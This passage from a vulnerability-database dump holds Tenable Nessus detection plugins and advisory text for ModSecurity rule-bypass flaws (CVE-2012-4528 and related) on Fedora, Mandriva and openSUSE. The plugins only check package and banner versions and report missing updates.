Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=867424\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2012-November/093010.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?01dbaaaf\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2012-November/093011.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?6a448a98\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected mod_security and / or mod_security_crs packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:mod_security\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:mod_security_crs\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:18\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/11/15\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/11/26\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n 
exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^18([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 18.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC18\", reference:\"mod_security-2.7.1-3.fc18\")) flag++;\nif (rpm_check(release:\"FC18\", reference:\"mod_security_crs-2.2.6-3.fc18\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"mod_security / mod_security_crs\");\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2021-01-12T10:10:14", "description": " - Update to 2.7.1\n\n - Update Core rules set to 2.2.6\n\n - Fix build against libxml2 >= 2.9 (upstreamed)\n\n - Add some missing directives RHBZ #569360\n\n - Fix multipart/invalid part ruleset bypass issue\n (CVE-2012-4528) (RHBZ #867424, #867773, #867774)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 13, "published": "2012-12-03T00:00:00", "title": "Fedora 17 : mod_security-2.7.1-3.fc17 / mod_security_crs-2.2.6-3.fc17 (2012-18315)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-4528"], "modified": "2012-12-03T00:00:00", "cpe": ["cpe:/o:fedoraproject:fedora:17", "p-cpe:/a:fedoraproject:fedora:mod_security", "p-cpe:/a:fedoraproject:fedora:mod_security_crs"], "id": "FEDORA_2012-18315.NASL", "href": "https://www.tenable.com/plugins/nessus/63127", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2012-18315.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(63127);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2012-4528\");\n script_bugtraq_id(56096);\n script_xref(name:\"FEDORA\", value:\"2012-18315\");\n\n script_name(english:\"Fedora 17 : mod_security-2.7.1-3.fc17 / mod_security_crs-2.2.6-3.fc17 (2012-18315)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\" - Update to 2.7.1\n\n - Update Core rules set to 2.2.6\n\n - Fix build against libxml2 >= 2.9 (upstreamed)\n\n - Add some missing directives RHBZ #569360\n\n - Fix multipart/invalid part ruleset bypass issue\n (CVE-2012-4528) (RHBZ #867424, #867773, #867774)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=867424\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2012-December/093619.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?8afef71f\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2012-December/093620.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?dc638616\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected mod_security and / or mod_security_crs packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:mod_security\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:mod_security_crs\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:17\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/11/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/12/03\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n 
exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^17([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 17.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC17\", reference:\"mod_security-2.7.1-3.fc17\")) flag++;\nif (rpm_check(release:\"FC17\", reference:\"mod_security_crs-2.2.6-3.fc17\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"mod_security / mod_security_crs\");\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2021-01-01T03:47:37", "description": "According to its banner, the version of ModSecurity installed on the\nremote host is earlier than 2.7.0. It is, therefore, potentially\naffected by a security bypass vulnerability. 
An error exists related\nto HTTP POST requests and 'Content-Disposition' headers containing\nextra lines that could allow a remote attacker to bypass certain\nfilters and carry out attacks.\n\nNote that Nessus has not tested for this issue but has instead relied\nonly on the version in the server's banner.", "edition": 26, "published": "2013-07-02T00:00:00", "title": "ModSecurity < 2.7.0 Multipart Request Parsing Filter Bypass", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-4528"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/a:modsecurity:modsecurity"], "id": "MODSECURITY_2_7_0.NASL", "href": "https://www.tenable.com/plugins/nessus/67126", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(67126);\n script_version(\"1.9\");\n script_cvs_date(\"Date: 2019/11/27\");\n\n script_cve_id(\"CVE-2012-4528\");\n script_bugtraq_id(56096);\n\n script_name(english:\"ModSecurity < 2.7.0 Multipart Request Parsing Filter Bypass\");\n script_summary(english:\"Checks version in Server response header\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web application firewall may be affected by a security\nbypass vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its banner, the version of ModSecurity installed on the\nremote host is earlier than 2.7.0. It is, therefore, potentially\naffected by a security bypass vulnerability. 
An error exists related\nto HTTP POST requests and 'Content-Disposition' headers containing\nextra lines that could allow a remote attacker to bypass certain\nfilters and carry out attacks.\n\nNote that Nessus has not tested for this issue but has instead relied\nonly on the version in the server's banner.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://seclists.org/fulldisclosure/2012/Oct/113\");\n script_set_attribute(attribute:\"see_also\", value:\"https://github.com/SpiderLabs/ModSecurity/blob/master/CHANGES\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to ModSecurity version 2.7.0 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2012-4528\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2012/10/15\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/10/15\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/07/02\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:modsecurity:modsecurity\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Firewalls\");\n\n script_copyright(english:\"This script is Copyright (C) 2013-2019 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"modsecurity_http_version.nasl\");\n script_require_keys(\"www/ModSecurity\", \"Settings/ParanoidReport\");\n script_require_ports(\"Services/www\", 80);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\n\nport = get_http_port(default:80);\n\n# Make sure this is ModSecurity\nget_kb_item_or_exit('www/'+port+'/modsecurity');\nversion = get_kb_item_or_exit('www/modsecurity/'+port+'/version', exit_code:1);\nbackported = get_kb_item_or_exit('www/modsecurity/'+port+'/backported', exit_code:1);\n\nif (report_paranoia < 2 && backported) audit(AUDIT_BACKPORT_SERVICE, port, \"ModSecurity\");\n\nif (version == 'unknown') audit(AUDIT_UNKNOWN_WEB_SERVER_VER, \"ModSecurity\", port);\n\nfixed_ver = '2.7.0';\nif (\n version =~ \"^[01]\\.\" ||\n version =~ \"^2\\.[0-6]($|[^0-9])\"\n)\n{\n if (report_verbosity > 0)\n {\n source = get_kb_item_or_exit('www/modsecurity/'+port+'/source', exit_code:1);\n report =\n '\\n Version source : ' + source +\n '\\n Installed version : ' + version +\n '\\n Fixed version : ' + fixed_ver + '\\n';\n security_warning(port:port, extra:report);\n }\n else security_warning(port);\n exit(0);\n}\nelse audit(AUDIT_LISTEN_NOT_VULN, \"ModSecurity\", port, version);\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2021-01-07T11:53:55", "description": "Multiple vulnerabilities has been discovered and corrected in\napache-mod_security :\n\nModSecurity before 2.6.6, when used with PHP, does not properly handle\nsingle quotes not at the beginning of a request parameter value in the\nContent-Disposition field of a request with a multipart/form-data\nContent-Type header, which allows remote attackers to bypass filtering\nrules and perform other attacks such as cross-site scripting (XSS)\nattacks. 
NOTE: this vulnerability exists because of an incomplete fix\nfor CVE-2009-5031 (CVE-2012-2751).\n\nModSecurity <= 2.6.8 is vulnerable to multipart/invalid part ruleset\nbypass, this was fixed in 2.7.0 (released on 2012-10-16)\n(CVE-2012-4528).\n\nThe updated packages have been patched to correct these issues.", "edition": 25, "published": "2012-12-24T00:00:00", "title": "Mandriva Linux Security Advisory : apache-mod_security (MDVSA-2012:182)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-2751", "CVE-2009-5031", "CVE-2012-4528"], "modified": "2012-12-24T00:00:00", "cpe": ["cpe:/o:mandriva:linux:2011", "p-cpe:/a:mandriva:linux:apache-mod_security", "p-cpe:/a:mandriva:linux:mlogc"], "id": "MANDRIVA_MDVSA-2012-182.NASL", "href": "https://www.tenable.com/plugins/nessus/63331", "sourceData": "#%NASL_MIN_LEVEL 70300\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Mandriva Linux Security Advisory MDVSA-2012:182. 
\n# The text itself is copyright (C) Mandriva S.A.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(63331);\n script_version(\"1.15\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2012-2751\", \"CVE-2012-4528\");\n script_bugtraq_id(54156, 56096);\n script_xref(name:\"MDVSA\", value:\"2012:182\");\n\n script_name(english:\"Mandriva Linux Security Advisory : apache-mod_security (MDVSA-2012:182)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Mandriva Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Multiple vulnerabilities has been discovered and corrected in\napache-mod_security :\n\nModSecurity before 2.6.6, when used with PHP, does not properly handle\nsingle quotes not at the beginning of a request parameter value in the\nContent-Disposition field of a request with a multipart/form-data\nContent-Type header, which allows remote attackers to bypass filtering\nrules and perform other attacks such as cross-site scripting (XSS)\nattacks. 
NOTE: this vulnerability exists because of an incomplete fix\nfor CVE-2009-5031 (CVE-2012-2751).\n\nModSecurity <= 2.6.8 is vulnerable to multipart/invalid part ruleset\nbypass, this was fixed in 2.7.0 (released on2012-10-16)\n(CVE-2012-4528).\n\nThe updated packages have been patched to correct these issues.\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected apache-mod_security and / or mlogc packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:apache-mod_security\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:mlogc\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandriva:linux:2011\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/12/23\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/12/24\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Mandriva Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/Mandrake/release\", \"Host/Mandrake/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Mandrake/release\")) audit(AUDIT_OS_NOT, \"Mandriva / Mandake Linux\");\nif (!get_kb_item(\"Host/Mandrake/rpm-list\")) 
audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^(amd64|i[3-6]86|x86_64)$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Mandriva / Mandrake Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"MDK2011\", reference:\"apache-mod_security-2.6.1-1.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"mlogc-2.6.1-1.1-mdv2011.0\", yank:\"mdv\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2021-01-20T12:26:46", "description": " - complete overhaul of this package, with update to 2.7.5.\n\n - ruleset update to 2.2.8-0-g0f07cbb. \n\n - new configuration framework private to mod_security2:\n /etc/apache2/conf.d/mod_security2.conf loads\n /usr/share/apache2-mod_security2/rules/modsecurity_crs_1\n 0_setup.conf, then /etc/apache2/mod_security2.d/*.conf ,\n as set up based on advice in\n /etc/apache2/conf.d/mod_security2.conf Your\n configuration starting point is\n /etc/apache2/conf.d/mod_security2.conf\n\n - !!! 
Please note that mod_unique_id is needed for\n mod_security2 to run!\n\n - modsecurity-apache_2.7.5-build_fix_pcre.diff changes\n erroneaous linker parameter, preventing rpath in shared\n object.\n\n - fixes contained for the following bugs :\n\n - CVE-2009-5031, CVE-2012-2751 [bnc#768293] request\n parameter handling\n\n - [bnc#768293] multi-part bypass, minor threat\n\n - CVE-2013-1915 [bnc#813190] XML external entity\n vulnerability\n\n - CVE-2012-4528 [bnc#789393] rule bypass\n\n - CVE-2013-2765 [bnc#822664] NULL pointer dereference\n crash\n\n - new from 2.5.9 to 2.7.5, only major changes :\n\n - GPLv2 replaced by Apache License v2\n\n - rules are not part of the source tarball any longer, but\n maintaned upstream externally, and included in this\n package.\n\n - documentation was externalized to a wiki. Package\n contains the FAQ and the reference manual in html form.\n\n - renamed the term 'Encryption' in directives that\n actually refer to hashes. See CHANGES file for more\n details.\n\n - new directive SecXmlExternalEntity, default off\n\n - byte conversion issues on s390x when logging fixed.\n\n - many small issues fixed that were discovered by a\n Coverity scanner\n\n - updated reference manual\n\n - wrong time calculation when logging for some timezones\n fixed.\n\n - replaced time-measuring mechanism with finer granularity\n for measured request/answer phases. 
(Stopwatch remains\n for compat.)\n\n - cookie parser memory leak fix\n\n - parsing of quoted strings in multipart\n Content-Disposition headers fixed.\n\n - SDBM deadlock fix\n\n - @rsub memory leak fix\n\n - cookie separator code improvements\n\n - build failure fixes\n\n - compile time option --enable-htaccess-config (set)", "edition": 21, "published": "2014-06-13T00:00:00", "title": "openSUSE Security Update : apache2-mod_security2 (openSUSE-SU-2013:1336-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-2751", "CVE-2009-5031", "CVE-2012-4528", "CVE-2013-2765", "CVE-2013-1915"], "modified": "2014-06-13T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:apache2-mod_security2-debugsource", "p-cpe:/a:novell:opensuse:apache2-mod_security2-debuginfo", "p-cpe:/a:novell:opensuse:apache2-mod_security2", "cpe:/o:novell:opensuse:12.2"], "id": "OPENSUSE-2013-640.NASL", "href": "https://www.tenable.com/plugins/nessus/75112", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2013-640.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(75112);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2009-5031\", \"CVE-2012-2751\", \"CVE-2012-4528\", \"CVE-2013-1915\", \"CVE-2013-2765\");\n\n script_name(english:\"openSUSE Security Update : apache2-mod_security2 (openSUSE-SU-2013:1336-1)\");\n script_summary(english:\"Check for the openSUSE-2013-640 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\" - complete overhaul of this package, with update to 2.7.5.\n\n - ruleset update 
to 2.2.8-0-g0f07cbb. \n\n - new configuration framework private to mod_security2:\n /etc/apache2/conf.d/mod_security2.conf loads\n /usr/share/apache2-mod_security2/rules/modsecurity_crs_1\n 0_setup.conf, then /etc/apache2/mod_security2.d/*.conf ,\n as set up based on advice in\n /etc/apache2/conf.d/mod_security2.conf Your\n configuration starting point is\n /etc/apache2/conf.d/mod_security2.conf\n\n - !!! Please note that mod_unique_id is needed for\n mod_security2 to run!\n\n - modsecurity-apache_2.7.5-build_fix_pcre.diff changes\n erroneaous linker parameter, preventing rpath in shared\n object.\n\n - fixes contained for the following bugs :\n\n - CVE-2009-5031, CVE-2012-2751 [bnc#768293] request\n parameter handling\n\n - [bnc#768293] multi-part bypass, minor threat\n\n - CVE-2013-1915 [bnc#813190] XML external entity\n vulnerability\n\n - CVE-2012-4528 [bnc#789393] rule bypass\n\n - CVE-2013-2765 [bnc#822664] NULL pointer dereference\n crash\n\n - new from 2.5.9 to 2.7.5, only major changes :\n\n - GPLv2 replaced by Apache License v2\n\n - rules are not part of the source tarball any longer, but\n maintaned upstream externally, and included in this\n package.\n\n - documentation was externalized to a wiki. Package\n contains the FAQ and the reference manual in html form.\n\n - renamed the term 'Encryption' in directives that\n actually refer to hashes. See CHANGES file for more\n details.\n\n - new directive SecXmlExternalEntity, default off\n\n - byte conversion issues on s390x when logging fixed.\n\n - many small issues fixed that were discovered by a\n Coverity scanner\n\n - updated reference manual\n\n - wrong time calculation when logging for some timezones\n fixed.\n\n - replaced time-measuring mechanism with finer granularity\n for measured request/answer phases. 
(Stopwatch remains\n for compat.)\n\n - cookie parser memory leak fix\n\n - parsing of quoted strings in multipart\n Content-Disposition headers fixed.\n\n - SDBM deadlock fix\n\n - @rsub memory leak fix\n\n - cookie separator code improvements\n\n - build failure fixes\n\n - compile time option --enable-htaccess-config (set)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=768293\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=789393\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=813190\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=822664\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.opensuse.org/opensuse-updates/2013-08/msg00025.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected apache2-mod_security2 packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-mod_security2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-mod_security2-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-mod_security2-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:12.2\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/08/05\");\n script_set_attribute(attribute:\"plugin_publication_date\", 
value:\"2014/06/13\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE12\\.2)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"12.2\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE12.2\", reference:\"apache2-mod_security2-2.7.5-14.4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", reference:\"apache2-mod_security2-debuginfo-2.7.5-14.4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", reference:\"apache2-mod_security2-debugsource-2.7.5-14.4.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"apache2-mod_security2 / apache2-mod_security2-debuginfo / etc\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-20T12:26:46", "description": " - complete overhaul of this package, with update to 2.7.5.\n\n - ruleset update to 
